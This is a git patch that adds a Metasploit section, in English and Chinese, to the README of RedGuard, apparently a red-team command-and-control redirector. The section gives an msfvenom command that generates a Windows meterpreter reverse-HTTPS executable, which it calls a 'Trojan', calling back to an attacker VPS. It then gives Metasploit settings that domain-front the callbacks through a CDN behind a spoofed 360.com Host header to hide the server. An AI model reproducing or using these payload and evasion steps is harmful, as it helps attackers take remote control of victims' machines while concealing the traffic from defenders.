From 4ccc4f7e696533a8a9686e86fb8b793953d4d00e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=A3=8E=E8=B5=B7?= <1402720815@qq.com> Date: Fri, 27 May 2022 20:12:55 +0800 Subject: [PATCH] Update README --- README.md | 27 +++++++++++++++++++++++++++ doc/README_CN.md | 27 +++++++++++++++++++++++++++ 2 files changed, 54 insertions(+) diff --git a/README.md b/README.md index 17aa0a8..46750c5 100644 --- a/README.md +++ b/README.md @@ -308,6 +308,33 @@ And because our basic verification is based on the HTTP HOST request header, wha For the listener settings, the online port is set to the RedGuard reverse proxy port, and the listening port is the actual online port of the local machine. +## Metasploit + +**Generates Trojan** + +```bash +$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com +-f exe -o ~/path/to/payload.exe +``` + +Of course, as a domain fronting scenario, you can also configure your LHOST to use any domain name of the manufacturer's CDN, and pay attention to setting the HttpHostHeader to match RedGuard. + +```bash +setg OverrideLHOST 360.com +setg OverrideLPORT 443 +setg OverrideRequestHost true +``` + +It is important to note that the `OverrideRequestHost` setting must be set to `true`. This is due to a quirk in the way Metasploit handles incoming HTTP/S requests by default when generating configuration for staging payloads. By default, Metasploit uses the incoming request's `Host` header value (if present) for second-stage configuration instead of the `LHOST` parameter. Therefore, the build stage is configured to send requests directly to your hidden domain name because CloudFront passes your internal domain in the `Host` header of forwarded requests. This is clearly not what we are asking for. Using the `OverrideRequestHost` configuration value, we can force Metasploit to ignore the incoming `Host` header and instead use the `LHOST` configuration value pointing to the origin CloudFront domain. + +The listener is set to the actual line port that matches the address RedGuard actually forwards to. + +![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/73315c83562826f16f64e2b277736c1.png) + +RedGuard received the request: + +![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/159a00e6c5596bc3542701b4a8020b1.png) + # 0x05 Loading Thank you for your support. RedGuard will continue to improve and update it. I hope that RedGuard can be known to more security practitioners. The tool refers to the design ideas of RedWarden. diff --git a/doc/README_CN.md b/doc/README_CN.md index f426d5f..ab22b49 100644 --- a/doc/README_CN.md +++ b/doc/README_CN.md @@ -308,6 +308,33 @@ RedGuard是支持域前置的,在我看来一共有两种展现形式,一种 对于监听器的设置上线端口设置为RedGuard反向代理端口,监听端口为本机实际上线端口。 +## Metasploit上线 + +**生成木马** + +```bash +$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com +-f exe -o ~/path/to/payload.exe +``` + +当然作为域前置场景也可以把你的LHOST配置为任意使用该厂商CDN的域名,注意设置HttpHostHeader与RedGuard相符即可。 + +```bash +setg OverrideLHOST 360.com +setg OverrideLPORT 443 +setg OverrideRequestHost true +``` + +请务必注意,该`OverrideRequestHost`设置必须设置为`true`。这是由于 Metasploit 在为暂存有效负载生成配置时默认处理传入 HTTP/S 请求的方式的一个怪癖。默认情况下,Metasploit 将传入请求的`Host`标头值(如果存在)用于第二阶段配置,而不是`LHOST`参数。因此,将生成阶段配置,以便将请求直接发送到您的隐藏域名,因为 CloudFront 在转发请求的`Host`标头中传递您的内部域。这显然不是我们所要求的。使用`OverrideRequestHost`配置值,我们可以强制 Metasploit 忽略传入`Host`的标头,而是使用`LHOST`指向原始 CloudFront 域的配置值。 + +监听器设置为实际上线端口,与RedGuard实际转发到的地址相匹配。 + +![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/73315c83562826f16f64e2b277736c1.png) + +RedGuard接收到请求: + +![867551fe860b10ca1396498a85422b4.jpg](https://github.com/wikiZ/RedGuardImage/raw/main/159a00e6c5596bc3542701b4a8020b1.png) + # 0x05 Loading 感谢各位用户的支持,RedGuard也会坚持进行完善更新的,希望 RedGuard 能够让更多安全从业者所知,工具参考了RedWarden的设计思想。